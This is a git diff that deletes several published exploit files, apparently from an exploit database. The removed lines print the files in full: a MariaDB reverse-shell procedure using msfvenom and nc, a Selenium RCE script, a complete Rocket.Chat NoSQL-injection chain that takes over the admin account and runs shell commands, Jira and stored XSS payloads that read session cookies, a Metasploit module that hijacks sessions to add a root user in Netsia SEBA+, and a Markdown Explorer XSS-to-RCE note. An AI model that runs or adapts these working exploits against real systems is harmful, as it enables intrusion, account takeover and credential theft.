Central InfoSec -# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL -# Tested on: Linux -# CVE : CVE-2021-27928 - -# Proof of Concept: - -# Create the reverse shell payload -msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf-so -o CVE-2021-27928.so - -# Start a listener -nc -lvp - -# Copy the payload to the target machine (In this example, SCP/SSH is used) -scp CVE-2021-27928.so @:/tmp/CVE-2021-27928.so - -# Execute the payload -mysql -u -p -h -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";' \ No newline at end of file diff --git a/exploits/linux/webapps/49915.rb b/exploits/linux/webapps/49915.rb deleted file mode 100755 index 432420b20..000000000 --- a/exploits/linux/webapps/49915.rb +++ /dev/null @@ -1,79 +0,0 @@ -# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) -# Date: 2021-05-27 -# Exploit Author: Jon Stratton -# Vendor Homepage: https://www.selenium.dev/ -# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar -# Version: 3.141.59 -# Tested on: Selenium Server 3.141.59, webdriver, geckodriver -# -# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb -# -# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started. -# -# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh” -# -# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system. -# -# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type. - -#!/usr/bin/env ruby - -require 'optparse' -require 'net/http' -require 'json' -require 'uri' -require 'zip' -require 'base64' - -options = {} -OptionParser.new do |opts| - opts.banner = 'Usage: example.rb [options]' - opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h| - options[:hub] = h - end - opts.on('--help', 'Prints this help') do - puts opts - exit - end -end.parse! - -hub_url = options[:hub] - -payload = 'rm -rf $0 -echo success > /tmp/selenium_node_rce.txt' - -# Build profile zip file. -stringio = Zip::OutputStream::write_buffer do |io| - # Create a handler for shell scripts - io.put_next_entry("handlers.json") - io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}') -end -stringio.rewind -encoded_profile = Base64.strict_encode64(stringio.sysread) - -# Create session with our new profile -newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}} - -uri = URI.parse(hub_url) -http = Net::HTTP.new(uri.host, uri.port) - -# Start session with encoded_profile and save session id for cleanup. -uri = URI.parse("%s/session" % [hub_url]) -request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') -request.body = JSON.generate(newSession) -response = http.request(request) -sessionId = JSON.parse(response.body)["value"]["sessionId"] - -# URL. -data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)] -uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId]) -request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json') -request.body = JSON.generate(:url => data_url) -response = http.request(request) - -# End session(not working) -uri = URI.parse("%s/session/%s" % [hub_url, sessionId]) -request = Net::HTTP::Delete.new(uri.request_uri) -http.request(request) - -exit \ No newline at end of file diff --git a/exploits/linux/webapps/49960.py b/exploits/linux/webapps/49960.py deleted file mode 100755 index 0876dc164..000000000 --- a/exploits/linux/webapps/49960.py +++ /dev/null @@ -1,172 +0,0 @@ -# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) -# Author: enox -# Date: 06-06-2021 -# Product: Rocket.Chat -# Vendor: https://rocket.chat/ -# Vulnerable Version(s): Rocket.Chat 3.12.1 -# CVE: CVE-2021-22911 -# Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat - -#!/usr/bin/python - -import requests -import string -import time -import hashlib -import json -import oathtool -import argparse - -parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') -parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) -parser.add_argument('-a', help='Administrator email', required=True) -parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) -args = parser.parse_args() - - -adminmail = args.a -lowprivmail = args.u -target = args.t - - -def forgotpassword(email,url): - payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) - print("[+] Password Reset Email Sent") - - -def resettoken(url): - u = url+"/api/v1/method.callAnon/getPasswordPolicy" - headers={'content-type': 'application/json'} - token = "" - - num = list(range(0,10)) - string_ints = [str(int) for int in num] - characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints - - while len(token)!= 43: - for c in characters: - payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) - r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) - time.sleep(0.5) - if 'Meteor.Error' not in r.text: - token += c - print(f"Got: {token}") - - print(f"[+] Got token : {token}") - return token - - -def changingpassword(url,token): - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) - if "error" in r.text: - exit("[-] Wrong token") - print("[+] Password was changed !") - - -def twofactor(url,email): - # Authenticating - sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() - payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) - if "error" in r.text: - exit("[-] Couldn't authenticate") - data = json.loads(r.text) - data =(data['message']) - userid = data[32:49] - token = data[60:103] - print(f"[+] Succesfully authenticated as {email}") - - # Getting 2fa code - cookies = {'rc_uid': userid,'rc_token': token} - headers={'X-User-Id': userid,'X-Auth-Token': token} - payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' - r = requests.get(url+payload,cookies=cookies,headers=headers) - code = r.text[46:98] - print(f"Got the code for 2fa: {code}") - return code - - -def changingadminpassword(url,token,code): - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' - headers={'content-type': 'application/json'} - r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) - if "403" in r.text: - exit("[-] Wrong token") - - print("[+] Admin password changed !") - - -def rce(url,code,cmd): - # Authenticating - sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() - headers={'content-type': 'application/json'} - payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' - r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) - if "error" in r.text: - exit("[-] Couldn't authenticate") - data = json.loads(r.text) - data =(data['message']) - userid = data[32:49] - token = data[60:103] - print("[+] Succesfully authenticated as administrator") - - # Creating Integration - payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' - cookies = {'rc_uid': userid,'rc_token': token} - headers = {'X-User-Id': userid,'X-Auth-Token': token} - r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) - data = r.text - data = data.split(',') - token = data[12] - token = token[9:57] - _id = data[18] - _id = _id[7:24] - - # Triggering RCE - u = url + '/hooks/' + _id + '/' +token - r = requests.get(u) - print(r.text) - -############################################################ - - -# Getting Low Priv user -print(f"[+] Resetting {lowprivmail} password") -## Sending Reset Mail -forgotpassword(lowprivmail,target) - -## Getting reset token -token = resettoken(target) - -## Changing Password -changingpassword(target,token) - - -# Privilege Escalation to admin -## Getting secret for 2fa -secret = twofactor(target,lowprivmail) - - -## Sending Reset mail -print(f"[+] Resetting {adminmail} password") -forgotpassword(adminmail,target) - -## Getting reset token -token = resettoken(target) - - -## Resetting Password -code = oathtool.generate_otp(secret) -changingadminpassword(target,token,code) - -## Authenticting and triggering rce - -while True: - cmd = input("CMD:> ") - code = oathtool.generate_otp(secret) - rce(target,code,cmd) \ No newline at end of file diff --git a/exploits/macos/webapps/50068.txt b/exploits/macos/webapps/50068.txt deleted file mode 100644 index 9c0b234d8..000000000 --- a/exploits/macos/webapps/50068.txt +++ /dev/null @@ -1,27 +0,0 @@ -# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) -# Date: 06/05/2021 -# Exploit Author: CAPTAIN_HOOK -# Vendor Homepage: https://www.atlassian.com/ -# Software Link: https://www.atlassian.com/software/jira/download/data-center -# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1 -# Tested on: ANY -# CVE : CVE-2021-26078 - -Description: - -The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability -*Fixed versions:* - - - 8.5.14 - - 8.13.6 - - 8.16.1 - - 8.17.0 - -POC: - - - *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege -user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22 -Your XSS Will be triggered immediately. - -Reference: -https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21 \ No newline at end of file diff --git a/exploits/multiple/webapps/49367.txt b/exploits/multiple/webapps/49367.txt deleted file mode 100644 index e6e20dc27..000000000 --- a/exploits/multiple/webapps/49367.txt +++ /dev/null @@ -1,37 +0,0 @@ -# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting -# Date: 30-12-2020 -# Exploit Author: Mesut Cetin -# Vendor Homepage: http://egavilanmedia.com -# Version: 1.0 -# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34 - -Vulnerable parameter: email, gender, username -Payload: - -Proof of Concept: - -To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps: - -1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php -2. Click above right on the "Profile" tab -3. Navigate to the "Edit Profile" tab -4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page. -5. Capture the POST request in Burp Suite and manipulate the parameter as shown: - -POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1 -Host: demo.egavilanmedia.com -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) -Accept: application/json, text/javascript, */*; q=0.01 -Accept-Language: de,en-US;q=0.7,en;q=0.3 -Accept-Encoding: gzip, deflate -Content-Type: application/x-www-form-urlencoded; charset=UTF-8 -X-Requested-With: XMLHttpRequest -Content-Length: 180 -Origin: http://demo.egavilanmedia.com -Connection: close -Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php -Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e - -fullname=admin&username=&email=&gender==&action=update_admin - -6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like , the session cookies can be send to the attacker. \ No newline at end of file diff --git a/exploits/multiple/webapps/49435.rb b/exploits/multiple/webapps/49435.rb deleted file mode 100755 index 8d45bcaca..000000000 --- a/exploits/multiple/webapps/49435.rb +++ /dev/null @@ -1,112 +0,0 @@ -## -# This module requires Metasploit: https://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class MetasploitModule < Msf::Auxiliary - include Msf::Exploit::Remote::HttpClient - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Netsia SEBA+ <= 0.16.1 Authentication Bypass and Add Root User' , - 'Description' => %q{ - This module exploits an authentication bypass in Netsia SEBA+, triggered by add new root/admin user. - HTTP requests made to the "Active Sessions" section which can be accessed by root/admin user, - can be performed without the need for any session(cookie) information. - Therefore, the session cookie informations of the active users in the application can be read from the response content. - A new authorized user can be created with the obtained cookie. - }, - 'References' => - [ - [ 'CVE', '' ], - [ 'URL', 'https://www.pentest.com.tr/exploits/Netsia-SEBA-0-16-1-Authentication-Bypass-Add-Root-User-Metasploit.html' ], - [ 'URL', 'https://www.netsia.com' ] - ], - 'Author' => - [ - 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus - ], - 'License' => MSF_LICENSE, - 'DisclosureDate' => "2021-01-06", - 'DefaultOptions' => { 'SSL' => true } - )) - - register_options( - [ - Opt::RPORT(443), - OptString.new('USERNAME', [true, 'The username for your new account']), - OptString.new('PASSWORD', [true, 'The password for your new account', Rex::Text.rand_text_alphanumeric(14)]) - ]) - end - - def peer - "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" - end - - def check - begin - res = send_request_cgi( - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), - ) - - rescue - return Exploit::CheckCode::Unknown - end - - if res.code == 200 and res.body.include? 'sessionId' - return Exploit::CheckCode::Vulnerable - else - if res.code == 200 and res.body.include? 'SUCCESS' - print_status("Target is vulnerable! But active admin session was not found. Try again later.") - return Exploit::CheckCode::Appears - end - end - - return Exploit::CheckCode::Safe - end - - def count_user(data, find_string) - data.scan(/(?=#{find_string})/).count - end - - def run - unless Exploit::CheckCode::Vulnerable == check - fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') - end - - res = send_request_cgi( - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, "session", "list", "allActiveSession"), - ) - sescount = count_user(res.body,'"name"') - print_good("Currently #{sescount} active sessions have been detected.") - - cookies = res.body.scan(/sessionId":"([\S\s]*?)","action/) - puts cookies - $i = 0 - - while $i <= sescount do - sessloop = cookies[$i] - sessid = "SESSION=" + sessloop.to_s - cookie = sessid.split('"]').join('').split('["').join('') - $i +=1 - json_data='{"data": {"password": "' + datastore["PASSWORD"] + '", "roles": [{"locations": [], "name": "admin", "permList": [{"data": ["/alarm-manager/alarm/definition/list", "/alarm-manager/alarm/active/list", "/alarm-manager/alarm/active/get", "/alarm-manager/alarm/log/list", "/alarm-manager/alarm/log/search"], "perm_key": "alarm:view"}, {"data": ["/sepon-core/profile/get/service", "/sepon-core/profile/list/service"], "perm_key": "services:view"}, {"data": ["/sepon-core/node/list/edge-ext"], "perm_key": "edge-ext:view"}, {"data": ["/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "uiconfig:view"}, {"data": ["/pal/switchinfo/list"], "perm_key": "switch:view"}, {"data": ["/asup/bbsl"], "perm_key": "asup:bbsl"}, {"data": ["/sepon-core/node/list", "/sepon-core/node/get"], "perm_key": "location:view"}, {"data": ["/pal/olt/get", "/pal/olt/nniport", "/pal/olt/ponport", "/pal/inventory/olt-list", "/sepon-core/node/list/olt", "/pal/laginfo/get"], "perm_key": "olt:view"}, {"data": ["/bbsl*/olt/reboot"], "perm_key": "olt:reboot"}, {"data": ["/sepon-core/node/delete"], "perm_key": "edge:delete"}, {"data": ["/user/add"], "perm_key": "default"}, {"data": ["/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/provision", "/bbsl*/subscriber/preprovision", "/bbsl*/subscriber/provision-subscriber", "/bbsl*/subscriber/change-speed-profile", "/bbsl*/subscriber/continue-provision-with-service-definition", "/bbsl*/subscriber/delete-service", "/bbsl*/subscriber/delete-services", "/bbsl*/subscriber/provision-service", "/bbsl*/subscriber/update-service-subscription"], "perm_key": "subscriptions:edit"}, {"data": ["/authentication-server/user/add", "/authentication-server/user/update"], "perm_key": "user:edit"}, {"data": ["/home/dashboard", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:edit"}, {"data": ["/sepon-core/node/delete/force"], "perm_key": "edge:forcedelete"}, {"data": ["/sepon-core/profile/delete/service"], "perm_key": "services:delete"}, {"data": ["/bbsl*/onu/provision-onu", "/bbsl*/onu/undo-provision", "/sepon-core/node/update", "/bbsl*/onu/delete-onu", "/bbsl*/onu/provision-onu", "/bbsl*/onu/update-serial", "/bbsl*/onu/onu-power"], "perm_key": "onu:edit"}, {"data": ["/alarm-manager/response-code"], "perm_key": "alarm:response-code"}, {"data": ["/authentication-server/request/list", "/authentication-server/request/search", "/authentication-server/request/count"], "perm_key": "request_history:view"}, {"data": ["/sepon-core/profile/add/service"], "perm_key": "services:edit"}, {"data": ["/authentication-server/user/delete"], "perm_key": "user:delete"}, {"data": ["/pal/speedprofile/delete", "/sepon-core/profile/delete/speed"], "perm_key": "speed_profiles:delete"}, {"data": ["/sepon-core/profile/sync/security", "/sepon-core/profile/add/sync/security", "/sepon-core/profile/delete/sync/security", "/sepon-core/profile/get/sync/security", "/sepon-core/profile/list/sync/security", "/sepon-core/profile/list/sync/security/by-profile-id", "/sepon-core/profile/list/sync/security/by-edge-id"], "perm_key": "security_profiles:sync"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list", "/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "dashboard:perf-query"}, {"data": ["/authentication-server/user/list", "/authentication-server/user/get"], "perm_key": "user:view"}, {"data": ["/bbsl*/onu/reboot"], "perm_key": "onu:reboot"}, {"data": ["/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/service-subscription", "/pal/subscriber/onu-list-service-location", "/pal/subscriber/uni-list-service-location", "/pal/subscriber/uni-list-service-serial", "/pal/subscriber/uni-service-info-location", "/pal/subscriber/uni-service-info-onu-serial-uni-no-service-name", "/pal/subscriber/uni-service-info-serial", "/pal/subscriber/uni-subscription-info-location"], "perm_key": "subscriptions:view"}, {"data": ["/pal/technologyprofile/get", "/pal/technologyprofile/list", "/sepon-core/profile/get/tech", "/sepon-core/profile/list/tech"], "perm_key": "tech_profiles:view"}, {"data": ["/authentication-server/response-code"], "perm_key": "auth:response-code"}, {"data": ["/sepon-core/node/move"], "perm_key": "location:move"}, {"data": ["/pal/olt-location/add"], "perm_key": "oltlocation:edit"}, {"data": ["/sepon-core/node/delete"], "perm_key": "location:delete"}, {"data": ["/home/dashboard", "/prometheus", "/sepon-core/ui/config/get", "/sepon-core/ui/config/list"], "perm_key": "dashboard:view"}, {"data": ["/authentication-server/role/list", "/authentication-server/role/get"], "perm_key": "role:view"}, {"data": ["/sepon-core/profile/sync/service", "/sepon-core/profile/add/sync/service", "/sepon-core/profile/delete/sync/service", "/sepon-core/profile/get/sync/service", "/sepon-core/profile/list/sync/service", "/sepon-core/profile/list/sync/service/by-profile-id", "/sepon-core/profile/list/sync/service/by-edge-id"], "perm_key": "services:sync"}, {"data": ["/sepon-core/node/get/root", "/pal/inventory/all", "/pal/inventory/pon-port-list", "/pal/inventory/uni-list", "/pal/inventory/onu-list", "/pal/inventory/olt-list", "/pal/switchinfo/list", "/pal/inventory/olt", "/pal/inventory/olt-list", "/pal/inventory/olt-location-list", "/pal/inventory/onu", "/pal/inventory/onu-list", "/pal/inventory/onu-with-serial-number", "/pal/inventory/pon-port", "/pal/inventory/pon-port-list", "/pal/inventory/uni", "/pal/inventory/uni-list", "/pal/inventory/uni"], "perm_key": "topology:view"}, {"data": ["/bbsl*/subscriber/update-service-subscription-status"], "perm_key": "services:statuschange"}, {"data": ["/sepon-core/profile/sync/speed", "/sepon-core/profile/add/sync/speed", "/sepon-core/profile/delete/sync/speed", "/sepon-core/profile/get/sync/speed", "/sepon-core/profile/list/sync/speed", "/sepon-core/profile/list/sync/speed/by-profile-id", "/sepon-core/profile/list/sync/speed/by-edge-id"], "perm_key": "speed_profiles:sync"}, {"data": ["/bbsl*/property/add", "/bbsl*/property/update", "/bbsl*/property/delete"], "perm_key": "property:edit"}, {"data": ["/sepon-core/node/add/edge", "/sepon-core/node/refresh/edge", "/sepon-core/node/get/edge", "/sepon-core/node/update"], "perm_key": "edge:edit"}, {"data": ["/sepon-core/profile/sync/tech", "/sepon-core/profile/add/sync/tech", "/sepon-core/profile/delete/sync/tech", "/sepon-core/profile/get/sync/tech", "/sepon-core/profile/list/sync/tech", "/sepon-core/profile/list/sync/tech/by-profile-id", "/sepon-core/profile/list/sync/tech/by-edge-id"], "perm_key": "tech_profiles:sync"}, {"data": ["/bbsl*/olt/delete"], "perm_key": "olt:delete"}, {"data": ["/sepon-core/node/list/edge", "/sepon-core/node/get/edge"], "perm_key": "edge:view"}, {"data": ["/sepon-core/node/add/location", "/sepon-core/node/update"], "perm_key": "location:edit"}, {"data": ["/alarm-manager/alarm/resolve"], "perm_key": "alarm:edit"}, {"data": ["/discovery/list"], "perm_key": "discovery:view"}, {"data": ["/pal/property/get"], "perm_key": "property:view"}, {"data": ["/sepon-core/node/move"], "perm_key": "edge:move"}, {"data": ["/asup/pal"], "perm_key": "asup:pal"}, {"data": ["/authentication-server/role/delete"], "perm_key": "role:delete"}, {"data": ["/pal/switchinfo/update"], "perm_key": "topology:edit"}, {"data": ["/pal/olt-location/delete"], "perm_key": "oltlocation:delete"}, {"data": ["/bbsl*/onu/disable", "/bbsl*/onu/enable"], "perm_key": "onu:statuschange"}, {"data": ["/alarm-manager/event/definition/list", "/alarm-manager/event/log/list", "/alarm-manager/event/log/search"], "perm_key": "event:view"}, {"data": ["/pal/technologyprofile/delete", "/sepon-core/profile/delete/tech"], "perm_key": "tech_profiles:delete"}, {"data": ["/pal/speedprofile/add", "/pal/speedprofile/create", "/sepon-core/profile/add/speed"], "perm_key": "speed_profiles:edit"}, {"data": ["/authentication-server/role/add", "/authentication-server/role/update"], "perm_key": "role:edit"}, {"data": ["/edge-*"], "perm_key": "gateway-test:view"}, {"data": ["/bbsl*/olt/add", "/sepon-core/node/update"], "perm_key": "olt:edit"}, {"data": ["/service-admin"], "perm_key": "service-admin:view"}, {"data": ["/asup/seba-central"], "perm_key": "asup:core"}, {"data": ["/alarm-manager/mailNotification/add", "/alarm-manager/mailNotification/update", "/alarm-manager/mailNotification/delete"], "perm_key": "alarm-mail:edit"}, {"data": ["/pal/securityprofile/get", "/pal/securityprofile/list", "/sepon-core/profile/get/security", "/sepon-core/profile/list/security"], "perm_key": "security_profiles:view"}, {"data": ["/alarm-manager/mailNotification/list", "/alarm-manager/mailNotification/active/list", "/alarm-manager/mailNotification/get"], "perm_key": "alarm-mail:view"}, {"data": ["/bbsl*/subscriber/delete", "/bbsl*/subscriber/delete-all-subscriber", "/bbsl*/subscriber/delete-list-of-service"], "perm_key": "subscriptions:delete"}, {"data": ["/bbsl*/olt/disable", "/bbsl*/olt/enable"], "perm_key": "olt:statuschange"}, {"data": ["/authentication-server/permission/list", "/authentication-server/permission/getByUser"], "perm_key": "permission:view"}, {"data": ["/sepon-core/ui/config/delete", "/sepon-core/ui/config/update"], "perm_key": "uiconfig:edit"}, {"data": ["/response-code"], "perm_key": "gateway:response-code"}, {"data": ["/pal/speedprofile/all", "/pal/speedprofile/get", "/pal/speedprofile/list", "/sepon-core/profile/get/speed", "/sepon-core/profile/list/speed"], "perm_key": "speed_profiles:view"}, {"data": ["/pal/ont/device", "/pal/ont/uniport", "/pal/ont/whitelist", "/pal/inventory/onu-list", "/pal/ont/stats-by-olt-number", "/pal/ont/stats-by-pon-port-number", "/pal/ont/search"], "perm_key": "onu:view"}, {"data": ["/pal/securityprofile/delete", "/sepon-core/profile/delete/security"], "perm_key": "security_profiles:delete"}, {"data": ["/pal/securityprofile/add", "/pal/securityprofile/create", "/sepon-core/profile/add/security"], "perm_key": "security_profiles:edit"}, {"data": ["/temip_integration/get_alarm_list"], "perm_key": "temip:view"}, {"data": ["/authentication-server/session/list"], "perm_key": "session:view"}, {"data": ["/stats-manager/response-code"], "perm_key": "stat:response-code"}, {"data": ["/bbsl*/onu/delete-onu"], "perm_key": "onu:delete"}, {"data": ["/pal/olt-location/get", "/pal/inventory/olt-location-list", "/sepon-core/node/list/oltLocation"], "perm_key": "oltlocation:view"}, {"data": ["/pal/technologyprofile/add", "/sepon-core/profile/add/tech"], "perm_key": "tech_profiles:edit"}]}, {"locations": [], "name": "default", "permList": [{"data": ["/user/add"], "perm_key": "default"}]}, {"locations": [{"id": 1, "name": "root"}], "name": "root", "permList": []}], "status": "ACTIVE", "username": "' + datastore["USERNAME"] + '"}}' - - res = send_request_raw({ - 'method' => 'POST', - 'ctype' => 'application/json', - 'uri' => normalize_uri(target_uri.path, 'authentication-server', 'user', 'add'), - 'cookie' => cookie, - 'data' => json_data - }) - - if res.code == 200 and res.body.include? '"SUCCESS"' - print_good("Excellent! User #{datastore["USERNAME"]} was added successfully with root, admin and default privileges.") - print_good("Username : #{datastore["USERNAME"]}") - print_good("Password : #{datastore["PASSWORD"]}") - break - end - end - end -end \ No newline at end of file diff --git a/exploits/multiple/webapps/49826.js b/exploits/multiple/webapps/49826.js deleted file mode 100644 index 95afe07da..000000000 --- a/exploits/multiple/webapps/49826.js +++ /dev/null @@ -1,29 +0,0 @@ -# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE -# Exploit Author: TaurusOmar -# Date: 04/05/2021 -# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H -# Risk: High (8.8) -# Vendor Homepage: https://github.com/jersou/markdown-explorer -# Version: 0.1.1 -# Tested on: Windows, Linux, MacOs - -# Software Description: -Easily explore, view and edit markdown documentation of a file tree. -If your projects documentation is written in Markdown, with md files dispersed throughout your project tree, Markdown Explorer displays md files in a tree structure, and it allows filtering by file name or by file content. -Just drop a folder on the window (or click on the folder icon on top left) to show the Markdown documentation of this folder. Then, explore the tree on the left, and toggle view/edit mode on md file with the button on the top right. - - -# Vulnerability Description: -The software allows you to store payloads within its own editor, as well as upload (.md) files once malicious code is entered, the payload will be executed immediately. -The attacker can send a malicious file with the payload, when this file is opened, the chain will be executed successfully giving access to -the remote attacker to get remote execution on the computer. - - -#Proof -https://imgur.com/a/w4bcPWs - - - -# Payload : exec(Attacker Reverse netcat stolen => /etc/passwd) && exec(calc) - -[